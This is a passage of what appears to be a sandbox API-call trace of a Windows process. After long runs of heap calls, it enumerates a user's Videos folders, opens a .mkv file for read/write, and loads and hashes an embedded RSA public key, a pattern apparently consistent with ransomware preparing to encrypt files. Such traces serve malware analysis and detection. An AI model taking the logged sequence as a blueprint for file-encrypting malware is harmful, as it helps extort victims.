dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0198.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0198.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0198.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0198.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0198.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0198.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0198.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0198.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.317] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\") returned="LzHDQsiji02\\" [0198.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47bb8 [0198.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.317] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\") returned="0o41ZS\\" [0198.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0198.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47bb8 | out: hHeap=0x6a0000) returned 1 [0198.318] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\") returned="Y5X8\\" [0198.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0198.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0198.318] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\") returned="SVKL6Wu5uab uSVqvA\\" [0198.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0198.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0198.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0198.319] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0198.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d670 [0198.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.319] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0198.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d670 | out: hHeap=0x6a0000) returned 1 [0198.320] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.320] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.320] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.320] PathFindFileNameW (pszPath="") returned="" [0198.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.320] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa910bfb0, ftCreationTime.dwHighDateTime=0x1d89773, ftLastAccessTime.dwLowDateTime=0x834fbba0, ftLastAccessTime.dwHighDateTime=0x1d89778, ftLastWriteTime.dwLowDateTime=0x834fbba0, ftLastWriteTime.dwHighDateTime=0x1d89778, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0198.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.323] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa910bfb0, ftCreationTime.dwHighDateTime=0x1d89773, ftLastAccessTime.dwLowDateTime=0x834fbba0, ftLastAccessTime.dwHighDateTime=0x1d89778, ftLastWriteTime.dwLowDateTime=0x834fbba0, ftLastWriteTime.dwHighDateTime=0x1d89778, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.324] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x297e23b0, ftCreationTime.dwHighDateTime=0x1d8a2c1, ftLastAccessTime.dwLowDateTime=0x1a6deb80, ftLastAccessTime.dwHighDateTime=0x1d8a677, ftLastWriteTime.dwLowDateTime=0x1a6deb80, ftLastWriteTime.dwHighDateTime=0x1d8a677, nFileSizeHigh=0x0, nFileSizeLow=0x14a2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3Exl.mkv", cAlternateFileName="")) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0198.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.324] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\3Exl.mkv") returned=".mkv" [0198.324] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\3Exl.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\3exl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.325] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=84527) returned 1 [0198.325] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.328] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x14a09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.328] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.330] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.330] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x14a2f, lpOverlapped=0x0) returned 1 [0198.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.332] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0198.333] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.333] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.333] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.334] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.334] GetLastError () returned 0x0 [0198.334] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.334] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0198.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.334] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.334] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.334] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14a30) returned 0x2d51778 [0198.335] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d670 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d6b8 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5a0 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.337] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.337] 